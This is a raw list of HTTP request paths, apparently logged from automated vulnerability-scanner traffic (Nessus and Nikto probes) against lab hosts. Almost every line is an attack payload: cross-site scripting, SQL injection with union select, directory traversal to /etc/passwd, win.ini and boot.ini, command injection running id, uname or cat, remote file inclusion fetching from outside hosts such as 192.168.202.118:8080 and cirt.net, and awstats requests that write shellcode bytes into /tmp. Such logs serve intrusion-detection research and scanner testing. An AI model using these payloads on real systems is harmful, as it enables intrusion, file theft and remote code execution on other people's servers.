/etc/passwd|\n/scripts/wx4z4gedhl0l.asp\n/9ko6m4c8.cgi?<script>document.cookie=\"testylik=3403;\"</script>\n/help.php?q=\"&rm;q53523271&rem;\n/main.php?logout=&ver,>q84866558&rem,\n/9o6g5vkn.mscgi?<script>cross_site_scripting.nasl</script>\n/j4oqyvga.dll?<script>cross_site_scripting.nasl</script>\n/recordings/index.php?op=default&date=200607' union select 1,236807234,1,1,1,1,1,1,1,1--&blogid=1\n/editvbscript/\n/javascript/document.txt\n/main.php?stuff='uname\\x09>q85612241\\x09#\n/examples/jsp/colors/index.php?user_langue=../../../../../../../../../../etc/passwd\n/jsp-examples/jsp2/el/functions.jsp?foo=nessus<script>alert(\"tomcat_jsp2_example_xss.nasl\")</script>\n/fpnpp5zg.pl?<script>document.cookie=\"testyias=101;\"</script>\n/main.php?logout=\"rm\\xa0q32937989&rem\\xa0\n/g3w7y7u5.jsp?<script>document.cookie=\"testbfpq=3326;\"</script>\n/ddoworrl.jspa?<script>document.cookie=\"testvlau=8517;\"</script>\n/maya's-mom/\n/scripts/password.asp\n/pwrisovm.exe/\n/javascript/configs.exe\n/0rufe52p.exe?<script>cross_site_scripting.nasl</script>\n/igtf0zon.idc?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\"&rm;q86839174&rem;\n/cacti/index.php?op=default&date=200607' union select 1,1437541757,1,1,1,1,1,1,1,1--&blogid=1\n/examples/jsp/cal/awstatstotals.php?sort=\"].passthru('id').exit().$a[\"\n/cacti/pals-cgi?palsaction=restart&documentname=/etc/passwd\n/gvx7m5ti.do?<meta http-equiv=set-cookie content=\"testwldz=3506\">\n/javascript/wiki.exe\n/examples/jsp/num/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\\x00\n/noprescriptionxanaxhydrocodoneovernightdelivery/\n/top.php?stuff=&ping;-w;7000;-n;1;4.3.2.1&rem;\n/scripts/starnet/addons/slideshow_full.php?album_name='1271410576\n/top.php?stuff=\"&del\\xa0q52711668&rem\\xa0\n/main.php?stuff=\"&del\\x0cq99279396&rem\\x0c\n/examples/servlets/servlet/profil.php?id=1 <script>foo</script>\n/examples/jsp/error/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\\x00\n/9kr0ih0v.nsf?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/phpmyadmin/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd|\n/javascript/document.tar.bz2\n/scripts/index.php?src=1&_common=1&time=1332008335&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/pm.php?function=sendpm&to=victim&subject=subject&images=javascript:alert('vulnerable')&message=message&submitpm=submit\n/script_path/administrator/components/com_admin/admin.admin.html.php?mosconfig_absolute_path=http://192.168.202.118:8080/zz5thkvtmlgl??\n/en-us/7o5qp766.jsp?<script>cross_site_scripting.nasl</script>\n/forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd\\x00&amp;page=1\n/examples/jsp/colors/yabb.pl?board=news&action=display&num=../../../../../../etc/passwd\\x00\n/main.php?stuff=\"&del\\x09q95961944&rem\\x09\n/<script>document.cookie=\"testwews=8477;\"</script>\n/rpxyx07v.exe?<meta http-equiv=set-cookie content=\"testbnli=1975\">\n/lsoix5h3.php3?<script>cross_site_scripting.nasl</script>\n/examples/jsp/num/sgdynamo.exe?htname=sgdynamo.exe\n/examples/jsp/sessions/index.php?id=0rop9yeuxw'\n/j2kdmfw4.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/lrn28issfuqi.asp\n/examples/jsp/error/dsweb/services/user-1\"><body onload=alert('xerox_docushare_dsweb_xss.nasl')>\n/phpmyadmin/wikka.php?wakka=homepage/../../actions/wikkachanges\n/opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.118:8080/zz5thkvtmlgl?\\x00\n/manager/login.pl?login=ledgersmb_script_code_exec.nasl&script=-e print \"content-type: text/plain\\x0d\\x0a\\x0d\\x0a\";system(id)&action=logout\n/scripts/www/delivery/ac.php?bannerid=-1331919145+or+1=1+--+';passthru(base64_decode($_server[http_nessus_8bf7v1kl]));die;/*\n/scripts/workarea/contentdesigner/ekformsiframe.aspx?id=\"><script>alert('nessus')</script>\n/3j8echh0.do?<script>document.cookie=\"testfuqi=4189;\"</script>\n/popuplargeimage.asp?strimagetag=<script>foo</script>\n/examples/jsp/jsp2/jspx/cgi/tseekdir.cgi?location=/etc/passwd\\x00\n/javascript/.passwd.lst\n/en-us/account/survey.inc.php?path=/etc/passwd\\x00\n/n1afe1y6.jspa?<script>cross_site_scripting.nasl</script>\n/javascript/queries.exe\n/javascript/2g.exe\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.24.202/main.php%3fstuff%3d1583574484&frm_user=&scr_height=&scr_width=q24961432\n/programmers-scripts/\n/a0imiuf1.cfm?<meta http-equiv=set-cookie content=\"testxqrn=4654\">\n/scripts/calendar.php?month=' union select 1,1,'1331919194','calendarix_month_sql_injection.nasl',1 #\n/ht8pn8uq.html?<script>cross_site_scripting.nasl</script>\n/javascript/utils.exe\n/examples/jsp/checkbox/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/examples/jsp/jsp2/jspx/ftp/ftp.pl?dir=../../../../../../etc\n/script_path/config.inc.php?_path=http://192.168.202.118:8080/2aibfaczmac8??\n/scripts/calendar.php?month=' union select 1,1,'1332010396','calendarix_month_sql_injection.nasl',1 #\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"\\0367\\0322\\0041\\03201\\0311qqj\\0042j\\0007pq\\0211\\0343\" >> /tmp/gjvtlghpjb0;echo|awstats158113.txt\n/examples/jsp/num/search.pl?form=../../../../../../etc/passwd\\x00\n/help.php?q='\\x0ddel\\x09q79317735\\x09#\n/uc3w3bdi.htm?<script>document.cookie=\"testxllt=9940;\"</script>\n/top.php?stuff=\"&rm\\xa0q52711668&rem\\xa0\n/main.php?logout=\"&del\\x09q84263823\\x09#\n/you're having a laff/\n/examples/jsp/jsp2/jspx/login.php?user=\"><script>alert('pubcookie_xss.nasl');</script>\n/isr_subscription/\n/examples/jsp/jsp2/jspx/language.php?data_dir=/etc/passwd\\x00\n/help.php?q=\\x0auname\\x09>q56269379\\x09#\n/examples/jsp/checkbox/survey.inc.php?path=/etc/passwd\\x00\n/ows-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/uvazfs7p.php3?<meta http-equiv=set-cookie content=\"testwtbo=4831\">\n/help.php?q='sleep\\x0911\\x09#\n/examples/jsp/jsp2/el/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x\n/scripts/openview5.exe?target=main&action=../../../../../../../../../..//windows/win.ini\n/scripts/mt-static/\n/cgi-914/fileseek2.cgi?foot=&head=;cat /etc/passwd|\n/9o6g5vkn.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=ver\\x0b>q69125734&rem\\x0b\n/script/ident/ident.inc.php?path_inc=http://cirt.net/rfiinc.txt?\n/main.php?stuff='\\x0drm\\x09q27918964\\x09#\n/javascript/wp.exe\n/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\\x00\n/examples/servlets/servlet/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904404')</script>\n/scripts/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt\\x00\n/osstmm-description/\n/p043snfr.htm?<script>cross_site_scripting.nasl</script>\n/cgi-915/gw5/gwweb.exe?htmlver=aaa&get-context\n/examples/jsp/sessions/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\\x00\n/ddoworrl.nsf?<script>document.cookie=\"testvlau=8517;\"</script>\n/script_wizard/\n/cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd\n/examples/jsp/colors/index.php?templates_dir=/etc/passwd\\x00\n/esmozg5d.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/el/index.php?act=arcade&do=stats&gameid=1'\n/help.php?q=\"ver\\x0c>q65994111&rem\\x0c\n/matrix reloaded original script/\n/j4drbkil.cgi?<script>cross_site_scripting.nasl</script>\n/82q7ywa8.php?<meta http-equiv=set-cookie content=\"testpwew=1315\">\n/help.php?q=\"|ping\\xa0-w\\xa08000\\xa0-n\\xa01\\xa01.2.3.4|rem\\xa0\n/nyvbv05h.pl?<meta http-equiv=set-cookie content=\"testftxz=5980\">\n/8x6w469u.mscgi?<meta http-equiv=set-cookie content=\"testgfjr=1286\">\n/manager/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\\x00\n/qhvu0pdg.htm?<meta http-equiv=set-cookie content=\"testchuc=2100\">\n/main.php?stuff=\"del q23955852 #\n/help.php?q=&uname\\x09>q21734839\\x09#\n/169okeyj.do?<meta http-equiv=set-cookie content=\"testxeoi=3573\">\n/vmi8bb12.html?<meta http-equiv=set-cookie content=\"testlerc=2575\">\n/manager/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd\n/um7xpn15.exe?<meta http-equiv=set-cookie content=\"testotoy=6142\">\n/v3axg1p8.php?<meta http-equiv=set-cookie content=\"testxagh=6987\">\n/q703m78q.jsp?<meta http-equiv=set-cookie content=\"testvowq=604\">\n/dda2qr7j.html?<script>cross_site_scripting.nasl</script>\n/scripta19sm95/\n/examples/jsp/colors/topic.php?tid='select\n/cgi-bin/comersus_searchitem.asp\"><script>alert('nessus was here');</script>\n/help.php?q=&ver;>q11223182&rem;\n/file/../../../../../../../../etc/\n/oie504mr.idc?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/unauthenticated/..\\x01/..\\x01/..\\x01/..\\x01/..\\x01/..\\x01/..\\x01/..\\x01/..\\x01/..\\x01/etc/passwd\n/lsoix5h3.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/checkbox/al_initialize.php?alpath=/etc/passwd\\x00\n/javascript/incoming.exe\n/examples/jsp/checkbox/search.jsp?q=%\"<script>alert(1331904374)</script>\n/javascript/send.exe\n/phpmyadmin/index.php?mod_id=2&kb_ask=</textarea><script>alert(\"cerberus_support_center_mult_flaws.nasl\")</script>\n/8x6w469u.dll?<script>document.cookie=\"testgfjr=1286;\"</script>\n/en-us/oie504mr.fts?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/phpmyadmin/documentation.html?phpmyadmin=\"><script > alert(201); </script >\n/scripts/includes/config.php?relative_script_path=http://xxxxxxx\n/main.php?logout=\"&del q77567986 #\n/0z575z74.cfm?<meta http-equiv=set-cookie content=\"testuhsv=9753\">\n/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd\n/help.php?q='&rm q65268232 #\n/javascript/.perf.exe\n/main.php?logout=\"\\x0adel q92897682 #\n/quagynka.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/surf.exe\n/main.php?stuff='\\x0auname\\x09#\n/scripts/search.cgi?..\\..\\..\\..\\..\\..\\winnt\\win.ini\n/l4fz1dqw.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/33y9gcqq.kspx?<script>document.cookie=\"testnvxc=4301;\"</script>\n/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331919216,1114321675 -- \n/9o6g5vkn.php3?<script>cross_site_scripting.nasl</script>\n/main.php?frm_daynight=day&frm_passwd=q35271317&frm_referer=http%3a//192.168.23.202/main.php&frm_user=&scr_height=&scr_width=\n/examples/jsp/num/inc/exif.inc.php?exif_prog=(echo -n 'original_exif_prog_cmd_exec.nasl: ';id)||echo\n/archive.php?scriptpath=http://192.168.202.96:8080/no4ghqiguzhst??\n/scripts/profile.asp?handle=foo'\n/m2fpztty.dll?<script>cross_site_scripting.nasl</script>\n/cacti/index.php?name=your account&profile=anyone\"><script>alert('nessus was here');</script>\n/index.php?func=manager&module=ew_filemanager&pathext=../../../etc/&type=admin&view=passwd\n/3hlysl2x.exe?<script>document.cookie=\"testgjbe=8505;\"</script>\n/javascript/.passwd.txt\n/scripts/index.php?id='union/**/select/**/0,0,1675094385,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/javascript/websql.exe\n/examples/jsp/jsp2/jspx/pmwiki.php?globals[farmd]=/etc/passwd\\x00\n/script/plugins/phpgacl/admin/index.php?path_inc=http://cirt.net/rfiinc.txt?\n/manuscripts/\n/godwin's_law/\n/h5sc3gxy.cfm?<script>cross_site_scripting.nasl</script>\n/scripts/ylrvly9nh_pf.cfm\n/main.php?stuff=\"\\x0arm q16731133 #\n/n9xlumt5.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/colors/awstatstotals.php?sort=\"].passthru('id').exit().$a[\"\n/8x6w469u.mscgi?<script>document.cookie=\"testgfjr=1286;\"</script>\n/scripts/preferences.php?action=setcookie\n/mail.php?id='/**/union/**/select/**/1,2,1331919012,4--&blog=1\n/examples/servlets/servlet/popup.php?include_path=/etc/passwd\\x00\n/<script>document.cookie=\"testqpux=4016;\"</script>\n/top.php?stuff=\"|ping\\x0b-w\\x0b11000\\x0b-n\\x0b1\\x0b1.2.3.4|rem\\x0b\n/main.php?logout=\"|ping;-w;7000;-n;1;1.2.3.4|rem;\n/apavxugx.html?<meta http-equiv=set-cookie content=\"testdnbh=5237\">\n/top.php?stuff='\\x0duname >q84295152 #\n/javascript/game.exe\n/cgi-bin/fileseek.cgi?head=&foot=;cat /etc/passwd\n/cgi-bin/starnet/addons/slideshow_full.php?album_name='959206944\n/top.php?stuff=\"&del q38114689 #\n/l13b77e5.jspa?<script>document.cookie=\"testjvvf=7721;\"</script>\n/order/login.php?svr_rootscript=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/hjdzm96v.fts?<script>document.cookie=\"testbyqe=7474;\"</script>\n/examples/jsp/jsp2/el/news/index.dot?id=../../../../../../../../../../../..//etc/passwd\\x00.jpg\n/examples/jsp/cal/cal2.jsp?time=8am<script>alert(\"tomcat_sample_cal2_xss.nasl\")</script>\n/javascript/html.exe\n/ao22ww7y.htm?<script>document.cookie=\"testqppc=8767;\"</script>\n/<script>document.cookie=\"testiabz=5220;\"</script>\n/examples/jsp/num/embed/day.php?path=/etc/passwd\\x00\n/dtmlscripting/\n/cgi-bin/redir.exe?url=http://www.google.com/\\x0d\\x0a\\x0d\\x0a<script>alert('vulnerable')</script>\n/1qwv2p5p.cfm?<meta http-equiv=set-cookie content=\"testvqcy=252\">\n/scripts/view-source\n/cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331908736,1948616015 -- \n/javascript/document.svn-base\n/cgi-914/gw5/gwweb.exe?help=bad-request\n/scripts/_xuzlr7swn95.php\n/eg2u8pbv.idc?<script>cross_site_scripting.nasl</script>\n..\\..\\..\\..\\..\\..\\winnt\\win.ini\n/9ko6m4c8.cfc?<meta http-equiv=set-cookie content=\"testylik=3403\">\n/main.php?stuff=\"del q73888727&rem \n/cgi-bin/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd\n/scripts/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params\"having 1=1\n/forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=\";echo ''; echo `id `;die();echo\"\n/u8yiqilu.mscgi?<script>document.cookie=\"testswjp=6010;\"</script>\n/javascript/embed.exe\n/javascript/hyper.exe\n/scripts/yfmo7jpwvpv1.shtml\n/recordings/index.php?page=documents&doc=-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null--\n/javascript/7z.exe\n/scripts/source?v=../../../../../../../../../../etc/passwd\\x00\n/gvx7m5ti.jsp?<meta http-equiv=set-cookie content=\"testwldz=3506\">\n/m5103snj.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"&ping\\x0b-w\\x0b9000\\x0b-n\\x0b1\\x0b4.3.2.1&rem\\x0b\n/examples/jsp/checkbox/php.cgi?/etc/passwd\n/msadc/..%u00255c..%u00255c/winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/scripts/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331908817')</script>\n/top.php?stuff=&uname\\x09>q89925289\\x09#\n/examples/jsp/colors/rot13sj.cgi?/etc/passwd\n/main.php?stuff=\\x0auname >q71856852 #\n/help.php?q=\"&rm\\x0bq12933545&rem\\x0b\n/opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.96:8080/vir0v3xfc?\\x00\n/scripts/survey.inc.php?path=/etc/passwd\\x00\n/recordings/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/starnet/addons/slideshow_full.php?album_name='1914539941\n/javascript/twitter.exe\n/help.php?q=\"&ping;-w;10000;-n;1;4.3.2.1&rem;\n/1r8cfrlf.nsf?<meta http-equiv=set-cookie content=\"testydan=5106\">\n/t7tm4m0b.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/<script>document.cookie=\"testhrzx=1150;\"</script>\n/scripts/javascript.php?abs_path=/etc/passwd\\x00\n/examples/jsp/jsp2/jspx/php.cgi?/etc/passwd\n/javascript/baz.exe\n/examples/jsp/colors/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini\n/?<meta http-equiv=set-cookie content=\"testblcp=8120\">\n/scripts/pssdseehtgdp.asp\n/qb2xy9aw.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff='\\x0duname\\x09>q87288375\\x09#\n/scripts/prnnucptkixl.cgi\n/scripts/counter.php?count_log_file=/nessus\n/scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://192.168.202.96:8080/llumt7msyau5y?\n/main.php?logout=\"ver;>q82885471&rem;\n/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- \n/help.php?q=\"|ping,-w,7000,-n,1,1.2.3.4|rem,\n/top.php?stuff='sleep\\x0910\\x09#\n/javascript/courses.exe\n/igtf0zon.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/jujgxwav.htm?<script>document.cookie=\"testknim=9383;\"</script>\n<meta http-equiv=set-cookie content=\"testxllt=9940\">\n//document.writeln(unescape(\"%3cscript src=%27http://www.example.com/test?rnd=q97635585%27><\"+string.fromcharcode(0x2f)+\"script>\"))\n/cgi-local/ppdscgi.exe\n/modif_infos.asp?n=`/etc/passwd`\n/examples/jsp/colors/showproduct.php?product=1'\n/scripting modules_information/\n/7o5qp766.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/shop.plx/page=nessus254998334\n/nsn/..\\util/userlist.bas\n/edv3mapy.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/subscription_info/\n/phpmyadmin/config.php?returnpath=/etc/passwd\\x00\n/main.php?stuff=\"&del,q75222715&rem,\n/scripts/e107_admin/admin.php\n/javascript/.passwd.tar.bz2\n/1qwv2p5p.idc?<meta http-equiv=set-cookie content=\"testvqcy=252\">\n/main.php?logout=\"&del\\x09q15516267&rem\\x09\n/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=jv05riwb6wrj9cito\n/a0imiuf1.nsf?<meta http-equiv=set-cookie content=\"testxqrn=4654\">\n/bin/msmmask.exe?mask=/junk334\n/phpmyadmin/nslookup.cgi?query=localhost;id&type=any&ns=\n/_vti_bin/shtml.dll/<script>alert(document.domain)</script>\n/ccscript/\n/ywaxntrx.asp?<script>cross_site_scripting.nasl</script>\n/nyjgaorz.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=\"ver&rem\\x09\n/examples/jsp/cal/cal_make.pl?p0=../../../../../../../../../etc/passwd\\x00\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.28.202/&frm_user=q55656717&scr_height=&scr_width=\n/top.php?stuff=&del;q36796118&rem;\n/javascript/buttons.exe\n/o35zot2r.kspx?<script>cross_site_scripting.nasl</script>\n/javascript/systems.exe\n/cgi-bin/faq.php?action=&type=view&s=&id=-1' union select 0,127142342,0,0,0,0,0--\n/scripts/apgafvcxoeeh.cfm\n/scripts/nph-exploitscanget.cgi?host=`id`&port=8080&errchk=0&idsbypass=0\n/cacti/catalog.php?action=category_show&id='\n/8x6w469u.nsf?<meta http-equiv=set-cookie content=\"testgfjr=1286\">\n/cacti/index.php?templates_dir=/etc/passwd\\x00\n/top.php?stuff=uname >q13339137 #\n/phpmyadmin/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\\x00\n/edv3mapy.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/fw_ghostscript-7/\n/dslpwt15.php3?<script>document.cookie=\"testtkio=5454;\"</script>\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+6c+41+68+56+69+72+74+54+56+ff+d7+83+c4+10+5a+52+6a+40+68+00+10+00+00+52+6a++>>ctdn\n/scripts/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904240','5'--\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"vj\\0001j\\0002\\0211\\0341j\\0001jfx\\0133\\0315\\0200\\0222\" >> /tmp/wrkvkjjzem0;echo|awstats181500.txt\n/yver8r9o.html?<script>cross_site_scripting.nasl</script>\n/s7qus4g3.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=\"rm q22289594 #\n/7dbjwpw6.php3?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/data/fetch.php?page='\n/igtf0zon.cgi?<script>cross_site_scripting.nasl</script>\n/examples/servlets/servlet/kb.cgi?view='&lang=en\n/ows-bin/.htpasswd\n/ywaxntrx.cfm?<script>cross_site_scripting.nasl</script>\n/bl8sefdm.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/index.php?mod_id=2&kb_ask=</textarea><script>alert(\"cerberus_support_center_mult_flaws.nasl\")</script>\n/scripts/index.php?gadget=glossary&action=view&term=<script>alert('jaws_xss.nasl');</script>\n/rbec2ohx.php?<script>cross_site_scripting.nasl</script>\n/en-us/ddoworrl.dll?<script>document.cookie=\"testvlau=8517;\"</script>\n/recordings/store.cgi?startid=../../../../../../../../../etc/passwd\\x00.html\n/help.php?q=&ping;-w;9000;-n;1;1.2.3.4&rem;\n/<script>document.cookie=\"testpwew=1315;\"</script>\n/exchange/..\\xc1%pc..\\xc1%pc..\\xc1%pc..\\xc1%pc..\\xc1%pc../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/qczkquis.pl?<meta http-equiv=set-cookie content=\"testkwlg=5591\">\n/javascript/wp-dbmanager.exe\n/phpwcms_template/inc_script/frontend_render/navigation/config_html_menu.php?html_menu_dirpath=http://cirt.net/rfiinc.txt?\n/confirmunsubscription.php?output=http://192.168.202.118:8080/2aibfaczmac8?\n/scripts/nryr3lvrjnwx.sh\n/scripts/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1332010414,1557267964 -- \n/?<script>document.cookie=\"testgfbr=7014;\"</script>\n/zmvq66jy.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/8t9v8k7x.x?<meta http-equiv=set-cookie content=\"testhvje=9403\">\n/cgi-bin/_head.php?_zb_path=../../../../../../../../../../etc/passwd\\x00\n/help.php?q=\"del\\x09q96611289\\x09#\n/6n7aacgg.nsf?<script>cross_site_scripting.nasl</script>\n/javascript/weblogs.exe\n/main.php?logout=ver\\x09>q55819526&rem\\x09\n/examples/jsp/checkbox/resetpw.php?email=../../../../../../../../../../../../etc/passwd\n/top.php?stuff=\"rm q83491369 #\n/javascript/lists.exe\n/scripts/categoryview.aspx?category=nessus\n/j4rdyhw8.nsf?<meta http-equiv=set-cookie content=\"testrluj=1420\">\n/examples/jsp/jsp2/el/pollit/poll_it_ssi_v2.0.cgi?data_dir=/etc/passwd\\x00\n/zln2hm2z.jspa?<meta http-equiv=set-cookie content=\"testblcp=8120\">\n//..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/etc/passwd\n/examples/servlets/servlet/styles.php?toroot=/etc/passwd\\x00\n/examples/servlets/servlet/pwcgi/smpwservicescgi.exe?target=http://www.nessus.org\n/raanw4ia.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/3m5knyc4.kspx?<meta http-equiv=set-cookie content=\"testbgqj=6434\">\n/main.php?logout=\\x0auname\\x09>q12532116\\x09#\n/diapo.php?rep=<script>alert(document.cookie)</script>\n/main.php?stuff=\"\\x0dsleep\\x097\\x09#\n/top.php?stuff=\"\\x0drm\\x09q29444369\\x09#\n/9ko6m4c8.pl?<script>document.cookie=\"testylik=3403;\"</script>\n/cgi-bin/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331909407','5'--\n/examples/jsp/checkbox/mmstdod.cgi?alternate_templates=| echo \"content-type: text/html\";echo \"\" ; id\\x00\n/index.php?id=b6q5w0grm_'\n/scripts/texis.exe/nessus\n/main.php?logout=\"&del\\xa0q66468753&rem\\xa0\n/recordings/search.php?searchstring=<script>foo</script>\n/custom_scripts/\n<script>document.cookie=\"testvqcy=252;\"</script>\n/main.php?logout=\"ping\\x0c-w\\x0c8000\\x0c-n\\x0c1\\x0c1.2.3.4&rem\\x0c\n/main.php?logout=\"ping\\x0b-w\\x0b9000\\x0b-n\\x0b1\\x0b1.2.3.4&rem\\x0b\n/s7qus4g3.cfm?<script>cross_site_scripting.nasl</script>\n/?<meta http-equiv=set-cookie content=\"testknim=9383\">\n/main.php?logout=\"rm\\x0cq37726783&rem\\x0c\n/aascripter/\n/zqqemp6j.idc?<script>cross_site_scripting.nasl</script>\n/modules/forums/bb_smilies.php?site_font=}--></style><script>alert('vulnerable')</script>\n/en-us/<script>document.cookie=\"testfutf=1550;\"</script>\n/fc9t54l7.fts?<script>document.cookie=\"testggad=2000;\"</script>\n/scripts/2sfdqydfaknx.html\n/search.jsp?q=%\"<script>alert(1331922005)</script>\n/t3af3tdz.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/officescan/cgi/jdkrqnotify.exe\n/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://192.168.202.118:8080/zz5thkvtmlgl??\n/help.php?q=\"|sleep\\x097\\x09#\n/main.php?stuff=\"|ping,-w,9000,-n,1,1.2.3.4|rem,\n/scripts/polls.scr.php?globals[pth][classes]=http://192.168.202.118:8080/zz5thkvtmlgl??\n/javascript/tests.exe\n/phpmyadmin/newsdesk.cgi?t=../../../../../../etc/passwd\n/en-us/account/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd\n/scripts/xuicksry9grj.php3\n/raanw4ia.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/9kr0ih0v.cfc?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/..\\..\\..\\..\\\\..\\..\\\\..\\..\\\\\\boot.ini\n/help.php?q=';uname >q95782248 #\n/manager/calendar.php?serverpath=/etc/passwd\\x00\n/d7ktpmcq.idc?<script>cross_site_scripting.nasl</script>\n/en-us/account/sawmill6cl.exe?ho+{complete_version}\n/scripts/starnet/addons/slideshow_full.php?album_name='1508239839\n/egaet53a.x?<script>cross_site_scripting.nasl</script>\n/help.php?q=';uname >q86575497 #\n/j4rdyhw8.asp?<meta http-equiv=set-cookie content=\"testrluj=1420\">\n/top.php?stuff=|ping;-w;8000;-n;1;4.3.2.1|rem;\n/rot13sj.cgi?/etc/passwd\n/examples/jsp/num/index.php?show=/etc/passwd\n/e9rx3ya4.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/tukodz3j.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scgi-bin/query?mss=../config\n/cgis/gw5/gwweb.exe?htmlver=aaa&get-context\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332008595&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.96:8080/txenjrxf3?\\x00\n/javascript/webcasts.exe\n/scripts/bpk_bsfe_4vq.inc\n/jw64yq8u.php?<script>document.cookie=\"testylfu=1313;\"</script>\n/examples/servlets/servlet/search/show.pl?url=file:/etc/passwd\n/en-us/jnv890lt.x?<script>cross_site_scripting.nasl</script>\n<script>document.cookie=\"testulex=4996;\"</script>\n/?<meta http-equiv=set-cookie content=\"testfosd=94\">\n/subscription/\n/ows-bin/query?mss=../config\n/main.php?stuff=\"ping\\xa0-w\\xa07000\\xa0-n\\xa01\\xa04.3.2.1&rem\\xa0\n/cgi-bin/search.jsp?q=%\"<script>alert(1331909235)</script>\n/help.php?q=\"ver\\xa0>q23773279&rem\\xa0\n/subscriptionmailsignupssl/\n/iktok2bw.mscgi?<script>cross_site_scripting.nasl</script>\n/bin/powerup/r.cgi?file=../../../../../../../../../../etc/passwd\n/script/param/param.inc.php?path_inc=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/cgi-bin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332010395',null,null,null,null --\n/?p4yl04d3=<script>alert(document.cookie)</script>\n/agent_affil.pl?login=<script>alert(\"414395594702\");</script>\n/recordings/mylog.html?screen=/etc/passwd\n/modules.php?name=web_links&l_op=viewlinkcomments&lid=2pp'/**/union/**/select/**/'412745581503'/*\n/zroo33l4.idc?<script>document.cookie=\"testiklc=904;\"</script>\n/javascript/forum.exe\n/admin/geo_zones.php?zone=<script>alert(414326083575)</script>\n/javascript/sex.exe\n/zipwise field 